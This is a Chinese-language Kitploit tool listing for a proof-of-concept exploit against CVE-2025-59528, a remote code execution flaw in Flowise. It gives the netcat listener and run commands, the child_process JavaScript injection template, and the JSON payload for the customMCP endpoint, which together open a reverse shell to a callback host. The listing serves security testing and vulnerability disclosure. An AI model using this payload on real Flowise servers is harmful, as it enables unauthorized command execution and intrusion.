Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59528 — CVE-2025-59528 的概念验证,演示了通过 mcpServerConfig 注入在 Flowise 中实现经过身份验证的远程代码执行,并提供了可复现的步骤,供授权测试使用。 | Kitploit
工具/GitHubGitHub/nymiitechtips/cve-2025-59528
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubnymiitechtips/cve-2025-59528

CVE-2025-59528

CVE-2025-59528 的概念验证,演示了通过 mcpServerConfig 注入在 Flowise 中实现经过身份验证的远程代码执行,并提供了可复现的步骤,供授权测试使用。

查看仓库
184个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Version française

CVE-2025-59528 概念验证

专注于在授权环境中对该漏洞进行技术验证的最小化 PoC。

前提条件

  • 您必须在目标 Flowise 仪表板上拥有一个用户账户。
  • 您必须拥有与该账户关联的有效 API 密钥。
  • 您必须在运行 PoC 之前于回调主机上启动监听器(示例:nc -lvn 4444)。

使用示例

首先启动监听器:

root@kitploit:~
nc -lvn 4444
root@kitploit:~
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY

将上述值替换为您授权环境中的实际设置。

CVE 摘要

  • 受影响产品:Flowise
  • 受影响版本:低于 3.0.5
  • 类型:远程代码执行(RCE)
  • 入口点:POST /api/v1/node-load-method/customMCP 端点

问题源于 inputs.mcpServerConfig 的处理方式:该值以允许服务端执行 JavaScript 的方式进行解析。实际上,经过身份验证的攻击者可以注入一个调用 child_process 并执行操作系统命令的表达式。

利用机制

利用流程如下:

  1. 向 customMCP 端点构建请求。
  2. 在 mcpServerConfig 中放入恶意 JavaScript 表达式。
  3. 触发 process.mainModule.require('child_process')。
  4. 执行操作系统命令(exec/execSync)。

如果被接受,服务器将在其系统上下文中执行该命令。

此 PoC 的工作原理(poc.py)

该脚本接受四个参数:

  • -d/--domain:目标域名
  • -lh/--host:回调 IP
  • -lp/--port:回调端口
  • -A/--api:Bearer API 令牌

然后它会:

  1. 构建易受攻击的 URL:http://<domain>/api/v1/node-load-method/customMCP
  2. 添加 Authorization: Bearer <token> 请求头
  3. 准备一条回调 shell 命令
  4. 将该命令注入到 JS 表达式中:
root@kitploit:~
({
  x: (function () {
    const cp = process.mainModule.require("child_process");
    cp.exec("<commande>");
    return 1;
  })(),
});
  1. 发送以下 JSON:
root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "<injected JS expression>"
  }
}
  1. 打印 HTTP 状态码和原始响应以进行验证。

此 PoC 的优势(对比 EDB 52440)

与 EDB PoC(其执行邮箱/密码登录、使用浏览器风格的请求头,并运行自由格式的 --cmd)相比,此脚本更适合纯 PoC 验证:

  1. 更直接:无登录流程,减少不必要的 HTTP 噪音。
  2. 更低的故障面:与前端/认证配置相关的步骤更少。
  3. 适合 CI 自动化:参数简单,输出快速。
  4. 验证更清晰:立即打印状态码和响应体。
  5. 聚焦核心 CVE 路径:mcpServerConfig 注入和服务端执行。

简而言之:EDB 脚本是更通用的攻击性演示,而此 PoC 更侧重于技术可复现性。

当前限制

  • 假设已存在有效的 API 令牌。
  • 不支持 https 模式或证书处理。
  • 无重试/退避逻辑。
  • 回调命令为硬编码(尚未通过 --cmd 参数化)。

负责任使用

仅对您拥有或已获得明确授权的系统进行测试。

下载工具